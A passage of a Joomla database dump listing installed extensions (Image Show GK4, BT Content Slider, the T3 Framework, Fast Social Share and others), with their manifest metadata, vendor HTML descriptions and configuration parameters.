}\\n\\t\\t\\tspan.readonly p.license { border-top: 1px solid #eee; font-size: 11px; margin: 30px 26px 0; padding: 6px 0; }\\n\\t\\t<\\/style>\\n\\n\\t\\t<span class=\\\"readonly\\\"><h1>Image Show GK4<small>ver. 1.6.0<\\/small><\\/h1><p>GK4 is new generation of our extensions dedicated to Joomla 1.6+.<\\/p><p>With Image Show GK4 module, you can create slideshow on a site which include various images and article fragments or texts defined by a user. Thanks to slide management system integrated in the module, its support is very easy, intuitive and fast. With the new method of creating module styles you can easily move your slideshow style from one template to other template.<\\/p> <p class=\'homepage\'><a href=\'http:\\/\\/tools.gavick.com\\/image-show.html\' target=\'_blank\'>Learn more at the Image Show GK4 project website.<\\/a><\\/p><p class=\'license\'>Image Show GK4 is released under the <a target=\\\"_blank\\\" href=\\\"http:\\/\\/www.gnu.org\\/licenses\\/gpl-2.0.html\\\">GNU\\/GPL v2 license.<\\/a><\\/p><\\/span>\\n\\t\\t\\n\\t\\t<span class=\'tooltip-content\'>Advanced slideshow module for Joomla! 3.x<\\/span>\\n\\t\",\"group\":\"\",\"filename\":\"mod_image_show_gk4\"}','{\"automatic_module_id\":\"1\",\"module_id\":\"gk-is-1\",\"moduleclass_sfx\":\"\",\"module_style\":\"gk_coffe\",\"memory_limit\":\"128M\",\"generate_thumbnails\":\"1\",\"random_slides\":\"0\",\"use_style_css\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10335,0,'plg_sys_smoothtop','plugin','smoothtop','system',0,1,1,0,'{\"name\":\"plg_sys_smoothtop\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Eric Schneider\",\"copyright\":\"Copyright (C) 2011 - 2012 Eric Schneider. All rights reserved.\",\"authorEmail\":\"eric.s@craziation.com\",\"authorUrl\":\"www.craziation.com\",\"version\":\"J1.7-2.5\\/1.2.2\",\"description\":\"PLG_SYS_SMOOTHTOP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"smoothtop\"}','{\"linktext\":\"\",\"linktitle\":\"\",\"revealposition\":\"250\",\"topalways\":\"0\",\"runinadmin\":\"0\",\"hz-pos\":\"right\",\"hz-offset\":\"5\",\"vt-pos\":\"bottom\",\"vt-offset\":\"5\",\"trans-effect\":\"Expo.easeInOut\",\"scrollduration\":\"500\",\"non-hover-trans\":\"0.7\",\"usestyle\":\"1\",\"linkstyle\":\"#smoothtop{\\r\\n\\theight:45px;\\r\\n\\twidth:45px;\\r\\n\\tbackground:url(\\/plugins\\/system\\/smoothtop\\/images\\/up-arrow.gif) center top no-repeat;\\r\\n\\t\\r\\n}\\r\\n\\r\\n#smoothtop:hover{background-position: center bottom;}\"}','','',0,'0000-00-00 00:00:00',0,0),(10336,0,'PLG_SPTHUMBNAIL','plugin','spthumbnail','content',0,1,1,0,'{\"name\":\"PLG_SPTHUMBNAIL\",\"type\":\"plugin\",\"creationDate\":\"October 2012\",\"author\":\"SP CYEND\",\"copyright\":\"SP CYEND - All rights reserved.\",\"authorEmail\":\"info@cyend.com\",\"authorUrl\":\"http:\\/\\/www.cyend.com\",\"version\":\"3.0.0\",\"description\":\"PLG_SPTHUMBNAIL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"spthumbnail\"}','{\"thumbnails_for\":\"2\",\"class\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10343,0,'FOF30','library','fof30','',0,1,1,0,'{\"name\":\"FOF30\",\"type\":\"library\",\"creationDate\":\"2018-12-07\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2010-2017 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"3.3.9\",\"description\":\"\\n\\t\\t\\n\\t\\tFramework-on-Framework (FOF) 3.x - The rapid application development framework for Joomla!.<br\\/>\\n\\t\\t<b>WARNING<\\/b>: This is NOT a duplicate of the FOF library already installed with Joomla!. It is a different version used by other extensions on your site. Do NOT uninstall either FOF package. If you do you will break your site.\\n\\t\\t\\n\\t\",\"group\":\"\",\"filename\":\"lib_fof30\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10347,0,'mod_wedal_christmas_tree','module','mod_wedal_christmas_tree','',0,1,0,0,'{\"name\":\"mod_wedal_christmas_tree\",\"type\":\"module\",\"creationDate\":\"12.2017\",\"author\":\"Wedal\",\"copyright\":\"Copyright (C) 2017 Wedal.ru. All rights reserved.\",\"authorEmail\":\"wedal@wedal.ru\",\"authorUrl\":\"wedal.ru\",\"version\":\"1.0.0\",\"description\":\"MOD_WEDAL_CHRISTMAS_TREE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_wedal_christmas_tree\"}','{\"width\":\"100%\",\"branches\":\"5\",\"treestyle\":\"0\",\"star\":\"1\",\"starcolor\":\"#FF0000\",\"ground\":\"1\",\"treesize\":\"5\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(10348,0,'MOD_SMARTCOUNTDOWN','module','mod_smartcountdown','',0,1,0,0,'{\"name\":\"MOD_SMARTCOUNTDOWN\",\"type\":\"module\",\"creationDate\":\"2012 - 2013\",\"author\":\"Alex Polonski\",\"copyright\":\"Copyright (c)2012 Alex Polonski\",\"authorEmail\":\"alex3493@yandex.ru\",\"authorUrl\":\"smartcalc.es\",\"version\":\"2.1\",\"description\":\"MOD_SMARTCDPRO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_smartcountdown\"}','{\"deadline\":\"now\",\"hide_zero_fields\":\"1\",\"show_countdown\":\"-1\",\"display_seconds\":\"1\",\"overload_labels\":\"0\",\"overload_labels_tpl\":\"\",\"separator_image\":\"\",\"separator_blink\":\"0\",\"js_library\":\"\",\"event_goto\":\"0\",\"event_goto_menu\":\"\",\"event_goto_url\":\"\",\"text_position\":\"top\",\"counter_layout\":\"column\",\"global_center\":\"1\",\"text_spacing\":\"6\",\"units_spacing\":\"4\",\"numbers_lables_spacing\":\"8\",\"module_width\":\"\",\"module_padding\":\"\",\"event_text_size\":\"20\",\"labels_position\":\"right\",\"labels_vert_pos\":\"middle\",\"scale_by\":\"0.6\",\"labels_size\":\"16\",\"min_days_width\":\"\",\"preview_mode\":\"down\"}','','',0,'0000-00-00 00:00:00',0,0),(10351,0,'file_fof30','file','file_fof30','',0,1,0,0,'{\"name\":\"file_fof30\",\"type\":\"file\",\"creationDate\":\"2021-08-12\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(c)2010-2021 Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"authorEmail\":\"nicholas@akeeba.com\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"3.8.1\",\"description\":\"\\n\\t\\t\\n\\t\\tFramework-on-Framework (FOF) 3.x - The rapid application development framework for Joomla!.<br\\/>\\n\\t\\t<b>WARNING<\\/b>: This is NOT a duplicate of the FOF library already installed with Joomla!. It is a different version used by other extensions on your site. Do NOT uninstall either FOF package. If you do you will break your site.\\n\\t\\t\\n\\t\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10354,0,'BT Content Slider','module','mod_bt_contentslider','',0,1,0,0,'{\"name\":\"BT Content Slider\",\"type\":\"module\",\"creationDate\":\"Sep 2011\",\"author\":\"www.bowthemes.com\",\"copyright\":\"Copyright (C) 2012 Bowthemes. All rights reserved.\",\"authorEmail\":\"support@bowthemes.com\",\"authorUrl\":\"http:\\/\\/www.bowthemes.com\",\"version\":\"2.3.8\",\"description\":\"\\n\\t\\n<div class=\\\"bt_description\\\">\\n\\t<h3>BT content slider Module Version 2.3.8<\\/h3>\\n\\t<a href=\\\"http:\\/\\/bowthemes.com\\\" target=\\\"_blank\\\"><img\\n\\t\\tsrc=\\\"..\\/modules\\/mod_bt_contentslider\\/admin\\/images\\/bt-slider.png\\\">\\n\\t<\\/a>\\n\\t<p>Helps to slide your articles from Joomla! categories with cool\\n\\t\\teffects, rich backend configs covering layout, animation control, auto\\n\\t\\tthumbnail creating, images resizing, numbering articles, sorting\\n\\t\\tect...<\\/p>\\n\\t<br clear=\\\"both\\\" \\/>\\n\\t<h3>Features<\\/h3>\\n\\t<ul class=\\\"list-style\\\">\\n\\t\\t<li>Compatibility with Joomla 1.6, 1.7, 2.5 and Joomla 3.x<\\/li>\\n\\t\\t<li>Content control display from any section, category or article ID\'s<\\/li>\\n\\t\\t<li>Support for<a href=\\\"http:\\/\\/getk2.org\\/\\\"> K2 component<\\/a><\\/li>\\n\\t\\t<li>Support for <a href=\\\"joomla-extensions\\/bt-porfolio-component.html\\\" target=\\\"_blank\\\" title=\\\"Portfolio Joomla component\\\">BT Portfolio component<\\/a><\\/li>\\n\\t\\t<li>Support for <a href=\\\"http:\\/\\/bit.ly\\/1baVxzb\\\">EasyBlog Component<\\/a><\\/li>\\n\\t\\t<li>Scalable size of the module<\\/li>\\n\\t\\t<li>Horizontal and vertical news presentation (columns and rows\\n\\t\\t\\tconfiguration).<\\/li>\\n\\t\\t<li>Support for responsive template<\\/li>\\n\\t\\t<li>Show text, image, author, date, section\\/category name and\\n\\t\\t\\tbutton \\\"read more\\\" option, with order customization.<\\/li>\\n\\t\\t<li>Image Cropping<\\/li>\\n\\t\\t<li>On\\/Off front page articles display in modules<\\/li>\\n\\t\\t<li>Easy and friendly back-end administration.<\\/li>\\n\\t\\t<li>Included French language.<\\/li>\\n\\t\\t<li>Used Javascript Framework: Jquery latest version<\\/li>\\n\\t\\t<li>Fully compatible: Firefox, IE7+, Opera 9.5, Safari, Netscape,\\n\\t\\t\\tGoogle Chrome, Camino, Flock 0.7+.<\\/li>\\n\\t<\\/ul>\\n\\t<h3>UPgrade versions<\\/h3>\\n\\t<p>\\n\\t\\tYour current versions is 2.3.8. <a target=\\\"_blank\\\" href=\\\"http:\\/\\/bowthemes.com\\/bt-content-slider.html\\\">Find our latest versions now<\\/a>\\n\\t<\\/p>\\n\\t<h3>Userful links<\\/h3>\\n\\t<ul>\\n\\t\\t<li><a target=\\\"_blank\\\" href=\\\"http:\\/\\/bowthemes.com\\/bowthemes.com\\/bt-content-slider.html\\\">Video tutorials<\\/a><\\/li>\\n\\t\\t<li><a target=\\\"_blank\\\" href=\\\"http:\\/\\/bowthemes.com\\/forums\\/14-bt-content-slider\\/\\\">Report bug<\\/a><\\/li>\\n\\t\\t<li><a target=\\\"_blank\\\" href=\\\"http:\\/\\/bowthemes.com\\/forums\\/14-bt-content-slider\\/\\\">Forum support<\\/a><\\/li>\\n\\t<\\/ul>\\n\\t<h3>About bow themes & copyright<\\/h3>\\n\\t<p>Bow Themes is Professional Joomla template provider. We are\\n\\t\\tfocused on creating unique, attractive and clean templates without\\n\\t\\tloosing flexibility and simplicity of customization<\\/p>\\n\\tCopyright (C) 2012 BowThemes\\n<\\/div>\\n<style>\\n.bt_description{\\n\\ttext-align: left;\\n}\\n.bt_description h3 {\\n\\ttext-transform: uppercase;\\n\\tmargin: 20px 0px 10px 0px;\\n}\\n\\n.bt_description img {\\n\\tfloat: left;\\n\\tmargin: 5px 10px 5px 0px;\\n}\\n\\n.bt_description p,.bt_description li {\\n\\tpadding: 5px 5px 5px 30px;\\n\\tlist-style: none outside none;\\n}\\n\\n.bt_description ul.list-style li {\\n\\tbackground: url(..\\/modules\\/mod_bt_contentslider\\/admin\\/images\\/tick.png)\\n\\t\\t0px 6px no-repeat;\\n\\tpadding-left: 30px;\\n\\tline-height: 15px;\\n}\\n<\\/style>\\n\",\"group\":\"\",\"filename\":\"mod_bt_contentslider\"}','{\"moduleclass_sfx\":\"\",\"content_title\":\"\",\"content_link\":\"\",\"butlet\":\"1\",\"navigation_top\":\"0\",\"navigation_right\":\"0\",\"next_back\":\"0\",\"module_width\":\"auto\",\"module_height\":\"auto\",\"auto_height\":\"1\",\"items_per_cols\":\"1\",\"items_per_rows\":\"3\",\"source\":\"category\",\"article_ids\":\"\",\"k2_article_ids\":\"\",\"btportfolio_article_ids\":\"\",\"k2_category\":\"\",\"btportfolio_category\":\"\",\"easyblog_article_ids\":\"\",\"joomla_tags\":\"\",\"k2_tags\":\"\",\"auto_category\":\"0\",\"sub_categories\":\"0\",\"limit_items\":\"12\",\"limit_items_for_each\":\"0\",\"user_id\":\"0\",\"show_featured\":\"1\",\"ordering\":\"created-asc\",\"content_plugin\":\"0\",\"use_introimg\":\"1\",\"use_caption\":\"0\",\"use_linka\":\"0\",\"show_title\":\"1\",\"limit_title_by\":\"word\",\"title_max_chars\":\"8\",\"show_intro\":\"1\",\"limit_description_by\":\"char\",\"description_max_chars\":\"100\",\"show_category_name\":\"1\",\"show_category_name_as_link\":\"1\",\"show_readmore\":\"1\",\"show_date\":\"0\",\"show_author\":\"0\",\"show_image\":\"1\",\"checkimg_fulltext\":\"0\",\"check_image_exist\":\"0\",\"image_align\":\"center\",\"equalHeight\":\"1\",\"image_thumb\":\"1\",\"thumbnail_width\":\"180\",\"thumbnail_height\":\"120\",\"image_quality\":\"80\",\"default_thumb\":\"1\",\"touch_screen\":\"0\",\"hovereffect\":\"1\",\"modalbox\":\"0\",\"next_back_effect\":\"slide\",\"bullet_effect\":\"slide\",\"pause_hover\":\"1\",\"interval\":\"5000\",\"duration\":\"500\",\"effect\":\"easeInQuad\",\"auto_start\":\"1\",\"auto_strip_tags\":\"1\",\"allow_tags\":\"\",\"open_target\":\"_parent\",\"loadJquery\":\"auto\",\"cache\":\"1\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10372,10208,'PLG_ACTIONLOG_AKEEBABACKUP','plugin','akeebabackup','actionlog',0,1,1,0,'{\"name\":\"PLG_ACTIONLOG_AKEEBABACKUP\",\"type\":\"plugin\",\"creationDate\":\"2019-05-29\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"6.5.1\",\"description\":\"PLG_ACTIONLOG_AKEEBABACKUP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"akeebabackup\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10377,801,'plg_system_weblinks','plugin','weblinks','system',0,1,1,0,'{\"name\":\"plg_system_weblinks\",\"type\":\"plugin\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SYSTEM_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"weblinks\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10378,801,'plg_editors-xtd_weblink','plugin','weblink','editors-xtd',0,0,1,0,'{\"name\":\"plg_editors-xtd_weblink\",\"type\":\"plugin\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_EDITORS-XTD_WEBLINK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"weblink\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10385,0,'plg_system_nrframework','plugin','nrframework','system',0,1,1,0,'{\"name\":\"plg_system_nrframework\",\"type\":\"plugin\",\"creationDate\":\"August 2016\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2021 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"4.5.6\",\"description\":\"PLG_SYSTEM_NRFRAMEWORK_DESC\",\"group\":\"\",\"filename\":\"nrframework\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10386,0,'GSD','component','com_gsd','',1,1,0,0,'{\"name\":\"GSD\",\"type\":\"component\",\"creationDate\":\"May 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2021 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"GSD_DESC\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10387,0,'PLG_GSD_CONTENT','plugin','content','gsd',0,1,1,0,'{\"name\":\"PLG_GSD_CONTENT\",\"type\":\"plugin\",\"creationDate\":\"May 2017\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2021 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"1.0\",\"description\":\"PLG_GSD_CONTENT_DESC\",\"group\":\"\",\"filename\":\"content\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10388,0,'plg_system_gsd','plugin','gsd','system',0,1,1,0,'{\"name\":\"plg_system_gsd\",\"type\":\"plugin\",\"creationDate\":\"April 2016\",\"author\":\"Tassos Marinos\",\"copyright\":\"Copyright \\u00a9 2021 Tassos Marinos All Rights Reserved\",\"authorEmail\":\"info@tassos.gr\",\"authorUrl\":\"http:\\/\\/www.tassos.gr\",\"version\":\"4.8.4\",\"description\":\"PLG_SYSTEM_GSD_DESC\",\"group\":\"\",\"filename\":\"gsd\"}','[]','','',0,'0000-00-00 00:00:00',0,0),(10400,10403,'T3 Framework','plugin','t3','system',0,1,1,0,'{\"name\":\"T3 Framework\",\"type\":\"plugin\",\"creationDate\":\"Oct 03, 2021\",\"author\":\"JoomlArt.com\",\"copyright\":\"Copyright (C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"info@joomlart.com\",\"authorUrl\":\"http:\\/\\/www.t3-framework.org\",\"version\":\"3.0.6\",\"description\":\"\\n\\t\\n\\t<div align=\\\"center\\\">\\n\\t\\t<div class=\\\"alert alert-success\\\" style=\\\"background-color:#DFF0D8;border-color:#D6E9C6;color: #468847;padding: 1px 0;\\\">\\n\\t\\t\\t\\t<a href=\\\"http:\\/\\/t3-framework.org\\/\\\"><img src=\\\"http:\\/\\/static.joomlart.com\\/images\\/jat3v3-documents\\/message-installation\\/logo.png\\\" alt=\\\"some_text\\\" width=\\\"300\\\" height=\\\"99\\\"><\\/a>\\n\\t\\t\\t\\t<h4><a href=\\\"http:\\/\\/t3-framework.org\\/\\\" title=\\\"\\\">Home<\\/a> | <a href=\\\"http:\\/\\/demo.t3-framework.org\\/\\\" title=\\\"\\\">Demo<\\/a> | <a href=\\\"http:\\/\\/t3-framework.org\\/documentation\\\" title=\\\"\\\">Document<\\/a> | <a href=\\\"https:\\/\\/github.com\\/t3framework\\/t3\\/blob\\/master\\/CHANGELOG.md\\\" title=\\\"\\\">Changelog<\\/a><\\/h4>\\n\\t\\t<p> <\\/p>\\n\\t\\t<p>Copyright 2004 - 2021 <a href=\'http:\\/\\/www.joomlart.com\\/\' title=\'Visit Joomlart.com!\'>JoomlArt.com<\\/a>.<\\/p>\\n\\t\\t<\\/div>\\n     <style>table.adminform{width: 100%;}<\\/style>\\n\\t <\\/div>\\n\\t\\t\\n\\t\",\"group\":\"\",\"filename\":\"t3\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10401,10403,'t3_blank','template','t3_blank','',0,1,1,0,'{\"name\":\"t3_blank\",\"type\":\"template\",\"creationDate\":\"March 12, 2020\",\"author\":\"JoomlArt.com\",\"copyright\":\"Copyright (C), J.O.O.M Solutions Co., Ltd. All Rights Reserved.\",\"authorEmail\":\"webmaster@joomlart.com\",\"authorUrl\":\"http:\\/\\/www.t3-framework.org\",\"version\":\"2.2.9\",\"description\":\"\\n\\t\\t\\n\\t\\t<div align=\\\"center\\\">\\n\\t\\t\\t<div class=\\\"alert alert-success\\\" style=\\\"background-color:#DFF0D8;border-color:#D6E9C6;color: #468847;padding: 1px 0;\\\">\\n\\t\\t\\t\\t<a href=\\\"http:\\/\\/t3-framework.org\\/\\\"><img src=\\\"http:\\/\\/static.joomlart.com\\/images\\/jat3v3-documents\\/message-installation\\/logo.png\\\" alt=\\\"some_text\\\" width=\\\"300\\\" height=\\\"99\\\"><\\/a>\\n\\t\\t\\t\\t<h4><a href=\\\"http:\\/\\/t3-framework.org\\/\\\" title=\\\"\\\">Home<\\/a> | <a href=\\\"http:\\/\\/demo.t3-framework.org\\/\\\" title=\\\"\\\">Demo<\\/a> | <a href=\\\"http:\\/\\/t3-framework.org\\/documentation\\\" title=\\\"\\\">Document<\\/a> | <a href=\\\"https:\\/\\/github.com\\/t3framework\\/t3\\/blob\\/master\\/CHANGELOG.md\\\" title=\\\"\\\">Changelog<\\/a><\\/h4>\\n\\t\\t\\t\\t<p> <\\/p>\\n\\t\\t\\t\\t<span style=\\\"color:#FF0000\\\">Note: T3 blank requires T3 plugin to be installed and enabled.<\\/span><p><\\/p>\\n\\t\\t\\t\\t<p>Copyright 2004 - 2020 <a href=\'http:\\/\\/www.joomlart.com\\/\' title=\'Visit Joomlart.com!\'>JoomlArt.com<\\/a>.<\\/p>\\n\\t\\t\\t<\\/div>\\n\\t\\t\\t<style>table.adminform{width: 100%;}<\\/style>\\n\\t\\t<\\/div>\\n\\t\\t\\n\\t\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10402,10403,'t3_bs3_blank','template','t3_bs3_blank','',0,1,1,0,'{\"name\":\"t3_bs3_blank\",\"type\":\"template\",\"creationDate\":\"March 12, 2020\",\"author\":\"JoomlArt.com\",\"copyright\":\"Copyright (C), J.O.O.M Solutions Co., Ltd. All Rights Reserved.\",\"authorEmail\":\"webmaster@joomlart.com\",\"authorUrl\":\"http:\\/\\/www.t3-framework.org\",\"version\":\"2.3.3\",\"description\":\"\\n\\t\\t\\n\\t\\t<div align=\\\"center\\\">\\n\\t\\t\\t<div class=\\\"alert alert-success\\\" style=\\\"background-color:#DFF0D8;border-color:#D6E9C6;color: #468847;padding: 1px 0;\\\">\\n\\t\\t\\t\\t<a href=\\\"http:\\/\\/t3-framework.org\\/\\\"><img src=\\\"http:\\/\\/static.joomlart.com\\/images\\/jat3v3-documents\\/message-installation\\/logo.png\\\" alt=\\\"some_text\\\" width=\\\"300\\\" height=\\\"99\\\"><\\/a>\\n\\t\\t\\t\\t<h4><a href=\\\"http:\\/\\/t3-framework.org\\/\\\" title=\\\"\\\">Home<\\/a> | <a href=\\\"http:\\/\\/demo.t3-framework.org\\/\\\" title=\\\"\\\">Demo<\\/a> | <a href=\\\"http:\\/\\/t3-framework.org\\/documentation\\\" title=\\\"\\\">Document<\\/a> | <a href=\\\"https:\\/\\/github.com\\/t3framework\\/t3\\/blob\\/master\\/CHANGELOG.md\\\" title=\\\"\\\">Changelog<\\/a><\\/h4>\\n\\t\\t\\t\\t<p> <\\/p>\\n\\t\\t\\t\\t<span style=\\\"color:#FF0000\\\">Note: T3 blank requires T3 plugin to be installed and enabled.<\\/span><p><\\/p>\\n\\t\\t\\t\\t<p>Copyright 2004 - 2020 <a href=\'http:\\/\\/www.joomlart.com\\/\' title=\'Visit Joomlart.com!\'>JoomlArt.com<\\/a>.<\\/p>\\n\\t\\t\\t<\\/div>\\n\\t\\t\\t<style>table.adminform{width: 100%;}<\\/style>\\n\\t\\t<\\/div>\\n\\t\\t\\n\\t\",\"group\":\"\",\"filename\":\"templateDetails\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10403,0,'T3 Framework Package','package','pkg_t3','',0,1,1,0,'{\"name\":\"T3 Framework Package\",\"type\":\"package\",\"creationDate\":\"March 12, 2020\",\"author\":\"t3-framework.org\",\"copyright\":\"(C) 2012 - 2020. All rights reserved.\",\"authorEmail\":\"support@t3-framework.org\",\"authorUrl\":\"www.t3-framework.org\",\"version\":\"2.7.6\",\"description\":\"\\t\\n\\t\\n\\t<div align=\\\"center\\\">\\n\\t\\t<div class=\\\"alert alert-success\\\" style=\\\"background-color:#DFF0D8;border-color:#D6E9C6;color: #468847;padding: 1px 0;\\\">\\n\\t\\t\\t\\t<a href=\\\"http:\\/\\/t3-framework.org\\/\\\"><img src=\\\"http:\\/\\/static.joomlart.com\\/images\\/jat3v3-documents\\/message-installation\\/logo.png\\\" alt=\\\"some_text\\\" width=\\\"300\\\" height=\\\"99\\\"><\\/a>\\n\\t\\t\\t\\t<h4><a href=\\\"http:\\/\\/t3-framework.org\\/\\\" title=\\\"\\\">Home<\\/a> | <a href=\\\"http:\\/\\/demo.t3-framework.org\\/\\\" title=\\\"\\\">Demo<\\/a> | <a href=\\\"http:\\/\\/t3-framework.org\\/documentation\\\" title=\\\"\\\">Document<\\/a> | <a href=\\\"https:\\/\\/github.com\\/t3framework\\/t3\\/blob\\/master\\/CHANGELOG.md\\\" title=\\\"\\\">Changelog<\\/a><\\/h4>\\n\\t\\t<p> <\\/p>\\n\\t\\t<p>Copyright 2004 - 2020 <a href=\'http:\\/\\/www.joomlart.com\\/\' title=\'Visit Joomlart.com!\'>JoomlArt.com<\\/a>.<\\/p>\\n\\t\\t<\\/div>\\n     <style>table.adminform{width: 100%;}<\\/style>\\n\\t <\\/div>\\n\\t\\t\\n\\t\",\"group\":\"\",\"filename\":\"pkg_t3\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10406,0,'Content - Fast Social Share','plugin','fastsocialshare','content',0,1,1,0,'{\"name\":\"Content - Fast Social Share\",\"type\":\"plugin\",\"creationDate\":\"September 2022\",\"author\":\"Joomla! Extensions Store\",\"copyright\":\"Copyright (C) 2018 - Joomla! Extensions Store. All Rights Reserved.\",\"authorEmail\":\"info@storejextensions.org\",\"authorUrl\":\"http:\\/\\/storejextensions.org\",\"version\":\"3.10\",\"description\":\"PLG_CONTENT_FASTSOCIALSHARE_DESCRIPTION\",\"group\":\"\",\"filename\":\"fastsocialshare\"}','{\"custom\":\"0\",\"position\":\"2\",\"alignment\":\"0\",\"headerText\":\"\",\"showInArticles\":\"1\",\"showInCategories\":\"0\",\"showInFrontPage\":\"0\",\"excludeSections\":\"\",\"excludeCats\":\"\",\"excludeArticles\":\"\",\"includeArticles\":\"\",\"use_http_domain\":\"0\",\"ogimage_detection\":\"1\",\"ogimage_detection_type\":\"image_fulltext\",\"ogtitle_detection\":\"1\",\"ogdescription_detection\":\"1\",\"og_incats\":\"0\",\"facebookLikeButton\":\"1\",\"facebookLikeAction\":\"like\",\"facebookLikeType\":\"button\",\"facebookLikeColor\":\"light\",\"facebookLikeShowfaces\":\"true\",\"facebookLikeWidth\":\"100\",\"facebookLikeAppId\":\"\",\"facebookShareMeButton\":\"1\",\"facebookShareMeButtonType\":\"core\",\"facebookShareMeCounter\":\"0\",\"facebookShareMeBadgeText\":\"FFFFFF\",\"facebookShareMeBadge\":\"3B5998\",\"facebookShareMeBadgeLabel\":\"Share\",\"twitterButton\":\"1\",\"twitterName\":\"\",\"twitterCounter\":\"horizontal\",\"twitterSize\":\"0\",\"linkedInButton\":\"0\",\"linkedInType\":\"right\",\"pinterestButton\":\"1\",\"whatsappButton\":\"1\",\"whatsappBadgeText\":\"#ffffff\",\"whatsappBadge\":\"#25d366\",\"whatsappBadgeLabel\":\"Whatsapp\",\"xingButton\":\"0\",\"xingCounter\":\"0\",\"xingShape\":\"rectangular\"}','','',0,'0000-00-00 00:00:00',0,0),(10407,0,'SP Portfolio','module','mod_sp_portfolio','',0,1,0,0,'{\"name\":\"SP Portfolio\",\"type\":\"module\",\"creationDate\":\"Jul 2013\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2013 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.5\",\"description\":\"Portfolio moudue for Joomla\",\"group\":\"\",\"filename\":\"mod_sp_portfolio\"}','{\"catid\":\"\",\"limit\":\"1\",\"column\":\"1\",\"ajaxlimit\":\"2\",\"orderby\":\"a.created\",\"ordering\":\"DESC\",\"show_featured\":\"\",\"module_layout\":\"default\",\"show_title\":\"1\",\"linked_title\":\"1\",\"show_category\":\"1\",\"show_url\":\"1\",\"show_introtext\":\"1\",\"show_readmore\":\"1\",\"ajax_loader\":\"1\",\"show_filter\":\"1\",\"load_jquery\":\"1\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}','','',0,'0000-00-00 00:00:00',0,0),(10408,0,'SP Simple Youtube','module','mod_sp_simple_youtube','',0,1,0,0,'{\"name\":\"SP Simple Youtube\",\"type\":\"module\",\"creationDate\":\"Apr 2011\",\"author\":\"JoomShaper.com\",\"copyright\":\"Copyright (C) 2010 - 2014 JoomShaper.com. All rights reserved.\",\"authorEmail\":\"support@joomshaper.com\",\"authorUrl\":\"www.joomshaper.com\",\"version\":\"1.7\",\"description\":\"Youtube module for Joomla 3.7 by JoomShaper.com\",\"group\":\"\",\"filename\":\"mod_sp_simple_youtube\"}','{\"moduleclass_sfx\":\"\",\"youtube_id\":\"\",\"width\":\"300\",\"height\":\"200\",\"responsive\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}','','',0,'0000-00-00 00:00:00',0,0),(10409,0,'Vina Animations Image Slider','module','mod_vina_animations_image_slider','',0,1,0,0,'{\"name\":\"Vina Animations Image Slider\",\"type\":\"module\",\"creationDate\":\"July 11, 2015\",\"author\":\"VinaGecko.com\",\"copyright\":\"Copyright (C) 2015 VinaGecko.com. All rights 